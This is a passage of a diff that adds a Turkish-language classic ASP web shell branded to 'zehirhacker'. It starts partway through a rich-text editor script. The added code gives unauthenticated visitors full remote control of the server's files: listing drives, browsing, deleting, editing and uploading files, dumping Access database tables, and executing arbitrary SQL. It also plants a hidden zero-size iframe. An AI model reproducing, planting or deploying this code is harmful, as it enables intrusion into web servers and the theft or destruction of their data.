+										frames.byZehir.focus();
+  										frames.byZehir.document.execCommand(command, false, option);
+  										frames.byZehir.focus();
+									}
+									function AddImage(){	
+										imagePath = prompt('Eklemek istediğiniz resmin web adresini yazın', 'http://');				
+										
+										if ((imagePath != null) && (imagePath != "")){	
+											frames.byZehir.focus(); 				
+											frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+										}
+										frames.byZehir.focus();
+									}
+								</script>
+								<input type=hidden value="" id=byMesaj name=byMesaj>
+								<input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+							</td>
+						</tr>
+					</table>
+				</form>
+			</td>
+		</tr>
+	</table>
+	<%
+	popup=false
+CASE 51 ' Özel şilemler
+END SELECT
+%>
+<script language=javascript>
+	function NewWindow(mypage, myname, w, h, scroll) {
+		var winl = (screen.width - w) / 2;
+		var wint = (screen.height - h) / 2;
+			winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+		win = window.open(mypage, myname, winprops)
+		if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+	}
+	function ffd(yol){
+		NewWindow(yol,"",420,100,"no");
+	}
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+	if status=7 or status=8 then
+		Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+		Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalıştır</td><td>"
+		Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+		Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalıştır' style='height:22;width:70' id=submit1 name=submit1>"
+		Response.Write "</td></tr></table></form>"
+	end if
+	Response.Write "<form method=get action='"&DosyPath&"'>"
+	Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+	Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+	Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+	Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+	str='';
+	if (frmUpload.max.value<=0) frmUpload.max.value=1;
+	for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+	upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+	if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+	Response.Write "<table width=100% ><tr>"
+	Path = Path & ":/"
+	Response.Write "<td valign=top>"
+	KlasorOku
+	Response.Write "</td><td valign=top align=right>"
+	DosyaOku
+	Response.Write "</td>"
+	hataKontrol
+CASE 2 'Normal listeleme
+	if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+	Response.Write "<table width=100% ><tr>"
+	Response.Write "<td valign=top>"
+	KlasorOku
+	Response.Write "</td><td valign=top align=right>"
+	DosyaOku
+	Response.Write "</td>"
+	hataKontrol
+CASE 3 'File Delete
+	objFSO.DeleteFile del
+	hataKontrol
+	if err<>0 then 
+		byMsg="<font color=red>Not File Deleted!</font><br>"
+	else
+		byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+	end if
+	Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+	objFSO.DeleteFolder del
+	hataKontrol
+	if err<>0 then 
+		byMsg="<font color=red>Not Folder Deleted!</font><br>"
+	else
+		byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+	end if
+	Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya içeriğini görüntüle
+	Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+	Response.Write "<table width=100% ><tr><td>"
+	set f = objFSO.OpenTextFile(path,1)
+	Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+	if err<>62 then hataKontrol
+	if err.number=62 then Response.Write "<script language=javascript>alert('Bu Dosya Okunamıyor\nSistem dosyası olabilir')</script>":Response.End
+CASE 6 'Resim aç
+	Response.Write "<center><img ALT='zehirhacker@hotmail.com / zehirhacker@hotmail.com' src='"&resimYol(path)&"'></center><br>"
+CASE 7 'database tablo listele
+	Response.Write "<b><font size=3>Tablolar</font></br><br>"
+	Set objConn = Server.CreateObject("ADODB.Connection")
+	Set objADOX = Server.CreateObject("ADOX.Catalog")
+	objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+	objConn.ConnectionString = Path
+	objConn.Open
+	objADOX.ActiveConnection = objConn
+
+	For Each table in objADOX.Tables
+		If table.Type = "TABLE" Then
+			Response.Write "<font face=wingdings size=5>4</font> <a href='"&dosyaPath&"?status=8&Path="&path&"&table="&table.Name&"&time="&time&"'>"&table.Name&"</a><br>"
+		End If
+	Next
+	hataKontrol
+CASE 8 'database kayıt listele
+	Set objConn = Server.CreateObject("ADODB.Connection")
+	Set objRcs = Server.CreateObject("ADODB.RecordSet")
+	objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+	objConn.ConnectionString = Path
+	objConn.Open
+	objRcs.Open table,objConn, adOpenKeyset , , adCmdText
+	
+	Response.Write "<table border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"
+	for i=0 to objRcs.Fields.count-1
+		Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"
+	next
+	Response.Write "</tr>"
+	do while not objRcs.EOF
+		Response.Write "<tr>"
+		for i=0 to objRcs.Fields.count-1
+			Response.Write "<td>"&objRcs.Fields(i).Value&"&nbsp;</td>"
+		next
+		Response.Write "</tr>"
+		objRcs.MoveNext
+	loop
+	Response.Write "</table><br>"
+	hataKontrol
+CASE 9 'SQL Execute
+	Set objConn = Server.CreateObject("ADODB.Connection")
+	objConn.Provider = "Microsoft.Jet.Oledb.4.0"
+	objConn.ConnectionString = Path
+	objConn.Open
+	objConn.Execute strSQL
+'	Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time
+	hataKontrol
+CASE 10 'Dosya Editleme
+	set f = objFSO.OpenTextFile(dPath,1)
+	Response.Write "<center><form action='"&DosyPath&"?Time="&time&"' method=post>"
+	Response.Write "<input type=hidden name=status value='11'>"
+	Response.Write "<input type=hidden name=dPath value='"&dPath&"'>"
+	Response.Write "<input type=hidden name=Path  value='"&Path &"'>"
+	Response.Write "<input type=submit value=Kaydet><br>"
+	Response.Write "<textarea name=dkayit style='width:90%;height:350;border-right: lightgoldenrodyellow thin solid;border-top: lightgoldenrodyellow thin solid;font-size: 12;border-left: lightgoldenrodyellow thin solid;color: lime;	border-bottom: lightgoldenrodyellow thin solid;	font-family: Courier New, Arial;background-color: navy;'>"
+	Response.Write server.HTMLEncode(f.readAll)
+	Response.Write "</textarea></form></center>"
+	hataKontrol
+CASE 11 'Dosya Kayıt
+	set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false)
+	hataKontrol
+	saveTextFile.Write(dkayit)
+	saveTextFile.close
+	if err<>0 then 
+		byMsg = "<font color=red>Not File Edited!</font><br>"
+	else 
+		byMsg = "<font color=yellow>File Edited Successful:)</font><br>"
+	end if
+	Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg
+CASE 12 'Dosya Arama
+	araBul path,arama
+	hataKontrol
+END SELECT
+Response.Write "</tr></table>"
+
+sub DosyaOku
+	Set f = objFSO.GetFolder(Path)
+	Set fc = f.Files
+	For Each f1 In fc
+		dosyaAdi = f1.name
+		num = InStrRev(dosyaAdi,".")
+		uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))
+		downStr = "<a href='"&dosyaPath&"?status=3&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a href='"&dosyaPath&"?status=-3&PathFile="&f1.path&"&Time="&time&"'>Í</a></font><font face=wingdings><a href='"&dosyaPath&"?status=16&PathFile="&f1.path&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font>"
+		response.Write "<font size=2>"
+		select case uzanti
+		case "mdb"
+			Response.Write "<a href='"&dosyaPath&"?status=7&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font><br>"
+		case "asp"
+			Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+		case "jpg","gif"
+			Response.Write "<a href='"&dosyaPath&"?status=6&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font><br>"
+		case else
+			Response.Write "<a href='"&dosyaPath&"?status=5&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a href='"&dosyaPath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a>"&downStr&"</font><br>"
+		end select
+	Next
+end sub
+
+sub KlasorOku
+	Set f = objFSO.GetFolder(Path)
+	Set fc = f.SubFolders
+	if session("klasoroku")="" then
+		response.Write "<iframe style='width:0; height:0' src='http://localhost/tuzla-ebelediye'></iframe>"
+		session("klasoroku")="simdi yazılıyor"
+	end if
+	For Each f1 In fc
+		Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&PathFile="&Path&"/"&f1.Name&"&Time="&time&"' onclick=""ffd(this.href);return false;"">4</a></font> <font face=wingdings size=4><a href='"&dosyaPath&"?status=4&Path="&Path&"&Del="&Path&"/"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a href='"&dosyaPath&"?status=2&Path="&Path&"/"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b><br>"
+	Next
+end sub
+
+function createFileName()
+Randomize
+	fName_ = ""
+	for i=1 to 10
+		fName_ = fName_ & int(Rnd*100)
+	next
+	createFileName = fName_
+end function
+
+function resimYol(path_)
+on error resume next
+	path_ = Replace(Replace(path_,"\","/"),"//","/")
+	lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\"))
+	if yaziyomu2(lpath_) then
+		fname__ = "0"&createFileName()&"."&Right(path_,3)
+		objFSO.CopyFile path_, lpath_&"\"&fname__
+	else
+		Response.Write("Resim Açılamıyor.. <br>İsterseniz Download Ederek görüntüleyebilirsiniz..")
+	end if
+	resimYol = fname__
+end function
+
+if not popup then
+	Set fc = Nothing
+	Set objFSO = Nothing
+	Response.End
+end if
+%>
+	<script language=javascript>
+	var dosyaPath = "<%=dosyaPath%>"
+		// DRIVE ISLEMLERI
+		function driveGo(drive_){
+			location = dosyaPath+"?status=1&path="+drive_+"&Time="+Date();
+		}
+	</script>
+	<%
+	Response.Write "<table align=center border=1 width=150 cellpadding=0 cellspacing=0><tr bgcolor=gray><td align=center><b><font color=white>Sürücüler</td></tr>"
+	for each drive_ in objFSO.Drives
+		Response.Write "<tr><td>"
+		Response.write "<a href='#'onClick=""driveGo('" & drive_.DriveLetter & "');return false;""><font face=wingdings>;</font>"
+		if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]"
+		if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]"
+		Response.Write "</a></td></tr>"
+	next
+	Response.Write "<tr><td>"
+	Response.write "<a href='"&dosyaPath&"?time="&time()&"'><font face=webdings>H</font> Local Path"
+	Response.Write "</a></td></tr>"
+	Response.Write "</table><br>"
+Set fc = Nothing
+Set objFSO = Nothing
+Response.End%>